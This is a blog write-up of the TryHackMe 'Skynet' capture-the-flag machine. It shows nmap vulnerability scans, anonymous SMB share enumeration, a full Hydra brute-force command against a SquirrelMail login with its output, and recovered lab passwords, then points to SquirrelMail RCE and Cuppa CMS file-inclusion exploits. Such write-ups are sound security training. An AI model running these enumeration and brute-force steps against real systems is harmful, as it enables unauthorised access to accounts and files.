
Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Skynet

Writeup about the Tryhackme linux machine Skynet

0 - Basic info

Linux machine

1 - Reconnaissance and enumeration

Nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
[sudo] password for u915: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 21:32 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|   Hosts that seem down (vulnerable):
|_    224.0.0.251
Nmap scan report for 10.10.😄
Host is up (0.036s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.😄
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.😄:80/
|     Form id: 
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_  /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   Apache httpd 2.4.18: 
|     	HTTPD:F564BBA32AA088833DA032B7EB77CA29	7.5	https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
|     	HTTPD:E74D6161229FA3D00A1783E6C3426C5D	7.5	https://vulners.com/httpd/HTTPD:E74D6161229FA3D00A1783E6C3426C5D
|     	HTTPD:C7D2DA1ACB016A5220CA8E74647BED26	7.5	https://vulners.com/httpd/HTTPD:C7D2DA1ACB016A5220CA8E74647BED26
|     	HTTPD:8F00FB1DD7567228376803FEDB0EC3B6	7.5	https://vulners.com/httpd/HTTPD:8F00FB1DD7567228376803FEDB0EC3B6
|     	HTTPD:7EEE138FD834328B3FC98E4B7FCAD266	7.5	https://vulners.com/httpd/HTTPD:7EEE138FD834328B3FC98E4B7FCAD266
|     	HTTPD:24E96D438275A8177C289509C796525C	7.5	https://vulners.com/httpd/HTTPD:24E96D438275A8177C289509C796525C
|     	HTTPD:237FAB5DE739A612077A245192137A48	7.5	https://vulners.com/httpd/HTTPD:237FAB5DE739A612077A245192137A48
|     	HTTPD:143F3A43D871E3AFFF956DB1049A6A2A	7.5	https://vulners.com/httpd/HTTPD:143F3A43D871E3AFFF956DB1049A6A2A
|     	HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4	7.5	https://vulners.com/httpd/HTTPD:0C6EE30D77005EBF2B39E351B1F3E2C4
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	*EXPLOIT*
|     	HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9	7.2	https://vulners.com/httpd/HTTPD:FC354B921BA807DFCACD7CD3C1D02FF9
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	*EXPLOIT*
|     	HTTPD:9CDB89FBD1162B1E462FDF5BEA375759	6.8	https://vulners.com/httpd/HTTPD:9CDB89FBD1162B1E462FDF5BEA375759
|     	HTTPD:13B5FCC9676077F8FD08063C83511140	6.8	https://vulners.com/httpd/HTTPD:13B5FCC9676077F8FD08063C83511140
|     	HTTPD:B057D0A07B0AC97248CE6210E08ACAF7	6.4	https://vulners.com/httpd/HTTPD:B057D0A07B0AC97248CE6210E08ACAF7
|     	HTTPD:99188FFDCAF9C4932D00C218A2E58EC7	6.4	https://vulners.com/httpd/HTTPD:99188FFDCAF9C4932D00C218A2E58EC7
|     	HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F	6.4	https://vulners.com/httpd/HTTPD:531CF2A74E1A5A02A1D6AE2505AD586F
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	*EXPLOIT*
|     	HTTPD:1696C4DDCBC58CE20005FCB002958C09	6.0	https://vulners.com/httpd/HTTPD:1696C4DDCBC58CE20005FCB002958C09
|     	HTTPD:BC81F521379C9038153151EAA84492CA	5.8	https://vulners.com/httpd/HTTPD:BC81F521379C9038153151EAA84492CA
|     	HTTPD:01BB9C701A4D4302EF59FA7EA89D9115	5.8	https://vulners.com/httpd/HTTPD:01BB9C701A4D4302EF59FA7EA89D9115
|     	EDB-ID:47689	5.8	https://vulners.com/exploitdb/EDB-ID:47689	*EXPLOIT*
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577*EXPLOIT*
|     	HTTPD:F292DF1CEE1729E4240D1D62A10F5D32	5.1	https://vulners.com/httpd/HTTPD:F292DF1CEE1729E4240D1D62A10F5D32
|     	HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7	5.1	https://vulners.com/httpd/HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7
|     	HTTPD:79096CA36FAE041205EFAB66A6D4EF4B	5.1	https://vulners.com/httpd/HTTPD:79096CA36FAE041205EFAB66A6D4EF4B
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-2161/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-0736/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	*EXPLOIT*
|     	HTTPD:E91F31FD116386F2922B3EDA4BE3899B	5.0	https://vulners.com/httpd/HTTPD:E91F31FD116386F2922B3EDA4BE3899B
|     	HTTPD:E05CACB9D575871BA1E3088D02930266	5.0	https://vulners.com/httpd/HTTPD:E05CACB9D575871BA1E3088D02930266
|     	HTTPD:D7BF4648C333C0F770A30DEB0A23601C	5.0	https://vulners.com/httpd/HTTPD:D7BF4648C333C0F770A30DEB0A23601C
|     	HTTPD:D5609C15618DCADFDAD5AD396F2B83D7	5.0	https://vulners.com/httpd/HTTPD:D5609C15618DCADFDAD5AD396F2B83D7
|     	HTTPD:D5091608B1DC5DB5CABE405261B7658E	5.0	https://vulners.com/httpd/HTTPD:D5091608B1DC5DB5CABE405261B7658E
|     	HTTPD:D26626D944F16D90B877FB157E4A128F	5.0	https://vulners.com/httpd/HTTPD:D26626D944F16D90B877FB157E4A128F
|     	HTTPD:D0D55654F7429E8A4965CBBE30779CD6	5.0	https://vulners.com/httpd/HTTPD:D0D55654F7429E8A4965CBBE30779CD6
|     	HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38	5.0	https://vulners.com/httpd/HTTPD:C191D6FAD0C97D0A2E0A2A9F7BFE6B38
|     	HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8	5.0	https://vulners.com/httpd/HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8
|     	HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6	5.0	https://vulners.com/httpd/HTTPD:B2B68FFCE0FB45D09BE91EE9ECBA07F6
|     	HTTPD:A5459AF02C9EC35CE80EA173C36C3F47	5.0	https://vulners.com/httpd/HTTPD:A5459AF02C9EC35CE80EA173C36C3F47
|     	HTTPD:99477914E1BE8FA85CEA0E956232C4C2	5.0	https://vulners.com/httpd/HTTPD:99477914E1BE8FA85CEA0E956232C4C2
|     	HTTPD:824D39D8A30F1234C966CBDA41E1C446	5.0	https://vulners.com/httpd/HTTPD:824D39D8A30F1234C966CBDA41E1C446
|     	HTTPD:73656ED41609146303D488C86337BC2D	5.0	https://vulners.com/httpd/HTTPD:73656ED41609146303D488C86337BC2D
|     	HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1	5.0	https://vulners.com/httpd/HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1
|     	HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5	5.0	https://vulners.com/httpd/HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5
|     	HTTPD:4EC9662496A151DDE6D030D9127572E7	5.0	https://vulners.com/httpd/HTTPD:4EC9662496A151DDE6D030D9127572E7
|     	HTTPD:42FA2547862AB3B3F5E7F776E2D90614	5.0	https://vulners.com/httpd/HTTPD:42FA2547862AB3B3F5E7F776E2D90614
|     	HTTPD:3647863A8E4AE972669D5EE60974E777	5.0	https://vulners.com/httpd/HTTPD:3647863A8E4AE972669D5EE60974E777
|     	HTTPD:18105DABC6D0ADE97D12B90F63EAE025	5.0	https://vulners.com/httpd/HTTPD:18105DABC6D0ADE97D12B90F63EAE025
|     	HTTPD:174A0D44882BCA7E2F229BC91D6D5A09	5.0	https://vulners.com/httpd/HTTPD:174A0D44882BCA7E2F229BC91D6D5A09
|     	HTTPD:04C30566E99EFB3C0D60F08EE2524591	5.0	https://vulners.com/httpd/HTTPD:04C30566E99EFB3C0D60F08EE2524591
|     	EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	5.0	https://vulners.com/exploitpack/EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EXPLOITPACK:2666FB0676B4B582D689921651A30355	5.0	https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355	*EXPLOIT*
|     	EDB-ID:40909	5.0	https://vulners.com/exploitdb/EDB-ID:40909	*EXPLOIT*
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573*EXPLOIT*
|     	1337DAY-ID-26574	5.0	https://vulners.com/zdt/1337DAY-ID-26574*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	*EXPLOIT*
|     	HTTPD:FF57290724543D4766EDDC4666992FE8	4.3	https://vulners.com/httpd/HTTPD:FF57290724543D4766EDDC4666992FE8
|     	HTTPD:F4FBBB7467F08F96828B98E753E5FE7D	4.3	https://vulners.com/httpd/HTTPD:F4FBBB7467F08F96828B98E753E5FE7D
|     	HTTPD:D94ACD37B5627A621B2D592BD44873F2	4.3	https://vulners.com/httpd/HTTPD:D94ACD37B5627A621B2D592BD44873F2
|     	HTTPD:D26FFC4C8AA598C5F130A0223836644E	4.3	https://vulners.com/httpd/HTTPD:D26FFC4C8AA598C5F130A0223836644E
|     	HTTPD:A5773ECB3CB67826707B252F21BB80BB	4.3	https://vulners.com/httpd/HTTPD:A5773ECB3CB67826707B252F21BB80BB
|     	HTTPD:86C509FC37A85DC3C01E3CE10402C6DC	4.3	https://vulners.com/httpd/HTTPD:86C509FC37A85DC3C01E3CE10402C6DC
|     	HTTPD:714A18409AEB3B8362DC4FA2B923CA7A	4.3	https://vulners.com/httpd/HTTPD:714A18409AEB3B8362DC4FA2B923CA7A
|     	HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8	4.3	https://vulners.com/httpd/HTTPD:43E63F90DCA6F418ACF2327C4F88C3D8
|     	EDB-ID:47688	4.3	https://vulners.com/exploitdb/EDB-ID:47688	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	HTTPD:2E568217BC35E0AA91DF49E7CE65CA67	3.5	https://vulners.com/httpd/HTTPD:2E568217BC35E0AA91DF49E7CE65CA67
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|     	PACKETSTORM:140265	0.0	https://vulners.com/packetstorm/PACKETSTORM:140265	*EXPLOIT*
|     	HTTPD:B6CF5630624F83951A477D36DC8FD634	0.0	https://vulners.com/httpd/HTTPD:B6CF5630624F83951A477D36DC8FD634
|     	HTTPD:94C27BCF50CA81A222019B9F06735AA1	0.0	https://vulners.com/httpd/HTTPD:94C27BCF50CA81A222019B9F06735AA1
|     	HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2	0.0	https://vulners.com/httpd/HTTPD:914D0BB6DF64CDA58BDF1461563DCBC2
|     	HTTPD:7ED2E94FC8175AF57B0B84C966E78986	0.0	https://vulners.com/httpd/HTTPD:7ED2E94FC8175AF57B0B84C966E78986
|     	HTTPD:55F8C86BB4FE80544B301C6F772E1F21	0.0	https://vulners.com/httpd/HTTPD:55F8C86BB4FE80544B301C6F772E1F21
|     	HTTPD:53F7D531D201D0209EE31F3FA8829F5B	0.0	https://vulners.com/httpd/HTTPD:53F7D531D201D0209EE31F3FA8829F5B
|     	HTTPD:21A860C56B7B6A55960FB17E72B7E4B4	0.0	https://vulners.com/httpd/HTTPD:21A860C56B7B6A55960FB17E72B7E4B4
|     	EDB-ID:46676	0.0	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	EDB-ID:42745	0.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	EDB-ID:40961	0.0	https://vulners.com/exploitdb/EDB-ID:40961	*EXPLOIT*
|_    	1337DAY-ID-531	0.0	https://vulners.com/zdt/1337DAY-ID-531	*EXPLOIT*
110/tcp open  pop3        Dovecot pop3d
|_sslv2-drown: 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_sslv2-drown: 
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/17%OT=22%CT=1%CU=34749%PV=Y%DS=2%DC=I%G=Y%TM=60CBA4D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=FA%TI=Z%CI=I%II=I%TS=8)OPS(O
OS:1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11N
OS:W7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R
OS:=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Network Distance: 2 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.60 seconds

Open ports: 80, 110, 139, 143 and 445.

Port 80 is open, but there is nothing useful on the index page, just an empty POST form that submits to itself:

<!DOCTYPE html>
<html>
	<head>
		<link rel="stylesheet" type="text/css" href="style.css">
		<link rel="shortcut icon" type="image/png" href="favicon.ico"/>
		<title>Skynet</title>
	</head>
	<body>
		<div>
			<img src="image.png"/>
			<form name="skynet" action="#" method="POST"><br>
				<input type="search" class="search"><br>
				<input type="submit" class="button" name="submit" value="Skynet Search">
				<input type="submit" class="button" name="lucky" value="I'm Feeling Lucky">
			</form>
		</div>
	</body>
</html>

Interesting path on port 80: /squirrelmail/src/login.php (SquirrelMail version 1.4.23 [svn]).

A login form for SquirrelMail.

SquirrelMail is vulnerable to RCE (CVE-2017-7692), but it is an authenticated RCE, so I need to find some credentials first to make it work.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

Testing SMB on port 445 with an anonymous (null session) login:

smbclient --no-pass -L //10.10.😄

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

There are some shares to test; starting with the anonymous share:

smbclient --no-pass //10.10.😄/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 17:04:00 2020
  ..                                  D        0  Tue Sep 17 09:20:17 2019
  attention.txt                       N      163  Wed Sep 18 05:04:59 2019
  logs                                D        0  Wed Sep 18 06:42:16 2019

		9204224 blocks of size 1024. 5831108 blocks available

Downloading the text file:

get attention.txt

Enumerating the logs directory: there are three log files, but only one has content. Downloading log1.txt:

get log1.txt

Looking into the files:

cat attention.txt 
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cat log1.txt     
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

So the passwords were changed, and the log file probably contains passwords: I can use it as a wordlist with Hydra to brute-force the mail login form.

2 - Vulnerability Identification

Brute-forcing with Hydra to test my luck:

hydra -l milesdyson -P /home/u915/Escritorio/tryhackme/skynet/pass.txt 10.10.😄 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-17 22:30:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.😄:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.😄   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-17 22:30:32

Great, I was lucky today: the password for the user milesdyson is cyborg007haloterminator.

Logging in to SquirrelMail with the new credentials reveals an interesting mail:

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

Another password found, this time for the other, password-protected share: the personal milesdyson share.

smbclient -U milesdyson //10.10.😄/milesdyson
Enter WORKGROUP\milesdyson's password: 
Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 11:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 11:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 11:05:14 2019
  notes                               D        0  Tue Sep 17 11:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 11:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 11:05:14 2019

		9204224 blocks of size 1024. 5830948 blocks available

Looking inside the notes directory:

smb: \notes\> ls
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 11:01:29 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 11:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 11:01:29 2019

		9204224 blocks of size 1024. 5830948 blocks available

Inside there is a relevant note, important.txt, with the following content:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

A new URL path is revealed: /45kra24zxs28v3yd


I enumerated the new URL with DirBuster and the medium wordlist; DirBuster found an administration page:

Cuppa CMS:

http://10.10.😄/45kra24zxs28v3yd/administrator


The CMS is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI):

https://www.exploit-db.com/exploits/25971

3 - Exploit

SquirrelMail is vulnerable to RCE, but it is an authenticated RCE. I had the credentials, but I was out of luck.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

